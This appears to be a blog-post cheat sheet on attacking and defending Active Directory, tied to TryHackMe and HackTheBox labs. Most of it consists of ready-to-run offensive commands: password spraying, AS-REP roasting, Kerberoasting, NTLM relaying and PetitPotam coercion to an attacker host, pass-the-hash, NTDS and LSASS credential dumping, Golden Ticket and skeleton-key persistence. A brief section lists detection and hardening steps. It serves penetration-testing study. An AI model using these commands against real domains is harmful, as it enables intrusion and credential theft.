# Active Directory Cheat Sheet for 2025

<figure><img src="https://cdn-images-1.medium.com/max/800/0*YMlH4El_HffbE7qz.png" alt=""><figcaption></figcaption></figure>

> *Active Directory is the spine of enterprise networks — break it, and the whole body collapses.*

Welcome to your **2025-ready Active Directory (AD) cheat sheet** — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like **TryHackMe’s Attacking AD, Ignite, Wreath**, and **HackTheBox’s Labs** (free tier).

## Scan Network & Initial Enumeration <a href="#b68a" id="b68a"></a>

📌 Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

### **Lab Used**: *TryHackMe — Ignite (Free)*

* `nmap -sP <target_range>` — Sweep the subnet for life.
* `nmap -PN -sV --top-ports 50 --open <target_ip>` — Fingerprint the top talkers.
* `nmap -PN --script smb-vuln* -p139,445 <target_ip>` — Check SMB doors for rusty locks.
* `cme smb <target_range>` — CrackMapExec meets Samba: Discover shares, users, and more.

## Active Directory Discovery <a href="#id-9b4d" id="id-9b4d"></a>

**Real-World Feel**: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

**Lab Used**: *TryHackMe — Attacking AD*

* `nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL` — Sniff out Domain Controllers.
* `dig axfr @dns_server domain.local` — (If misconfigured) grab every DNS record.
* `enum4linux -a -u "" -p "" <target_ip>` — Anonymous recon.
* `smbmap -u "guest" -p "" -P 445 -H <target_ip>` — Test for open access.

**Try This in Wreath**: Compare anonymous SMB access vs. guest login.

## Gaining Foothold: Attacks That Work <a href="#a15e" id="a15e"></a>

**This is your beachhead.** You’re not deep yet — but you’ve got a toe in the door.

**Password Spraying**

* `cme smb -u user.txt -p password.txt <target_ip>`→ Blanket login attempts with caution.

**AS-REP Roasting**

```
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat
```

* **Demo This**: *TryHackMe — Wreath*, where one user lacks pre-auth and leaks hashes.

**LLMNR Poisoning + Relays**

```
responder -I tun0 
ntlmrelayx.py -tf targets.txt -socks -smb2support
```

**PetitPotam NTLM Coercion**

* `PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip>` — Weaponized forced auth.

## Post-Exploitation & Lateral Movement <a href="#cf2a" id="cf2a"></a>

**This is where it gets cinematic.** You’ve got creds. Now you walk the domain.

**Real-Lab Example**: *HackTheBox — Offshore (Free)* has this exact flow with SMB shares, BloodHound ops, and user hops.

**BloodHound Collection**

```
bloodhound-python -d DOMAIN -u USER -p PASS -gc DC_IP -c all
```

**Enumerate Shares**

```
cme smb <target_ip> -u user -p pass --shares
```

**Kerberoasting**

```
GetUserSPNs.py -request -dc-ip DC_IP DOMAIN/USER:PASS
```

**Pass-the-Hash / Key**

```
evil-winrm -i <ip> -u user -H <NTLM hash>

wmiexec.py -hashes :NTLM user@target
```

## Domain Dominance <a href="#de7b" id="de7b"></a>

*Endgame begins.* You now own one machine. Time to own the forest.

**Credential Dumping**

```
secretsdump.py DOMAIN/USER:PASS@DC_IP # Get that juicy NTDS.dit.
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"
```

**Golden Ticket**

```
ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain DOMAIN <user>
```

**Skeleton Key**

`mimikatz "privilege::debug" "misc::skeleton"` — One key to rule them all.

## Blue Team & Detection Notes <a href="#id-2f66" id="id-2f66"></a>

**Defend like a hunter.** Here’s what defenders *should* be doing.

* Monitor PowerShell logs: `Sysmon + WinLogBeat + Elastic`.
* Detect responder/LLMNR poisoning with: `Invoke-DetectResponder.ps1`
* Enable SMB signing to nullify NTLM relays.
* Set `Audit Directory Services Changes` for object manipulation.
* Rotate `krbtgt` password twice after compromise.

*TryHackMe — Security Analyst Path* offers hands-on SIEM and GPO audit labs.

## Hash Cracking Cheat Codes <a href="#id-80cb" id="id-80cb"></a>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*aLnasR6M2fDo9SSFRIybMw.png" alt=""><figcaption></figcaption></figure>

## Bonus: Custom Tools & Power Scripts <a href="#id-1f7e" id="id-1f7e"></a>

* `PowerView.ps1` – Swiss army knife for AD enum.
* `SharpHound.exe` – Native collector for BloodHound.
* `Invoke-Kerberoast`, `Invoke-UserHunter`, `Get-GPPPassword` – Part of PowerSploit.
* `adidnsdump` – Digs through DNS for fun and creds.

## Final Note <a href="#f19c" id="f19c"></a>

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and **don’t memorize — internalize**.

> *“The more silently you move in AD, the louder your skills speak.”*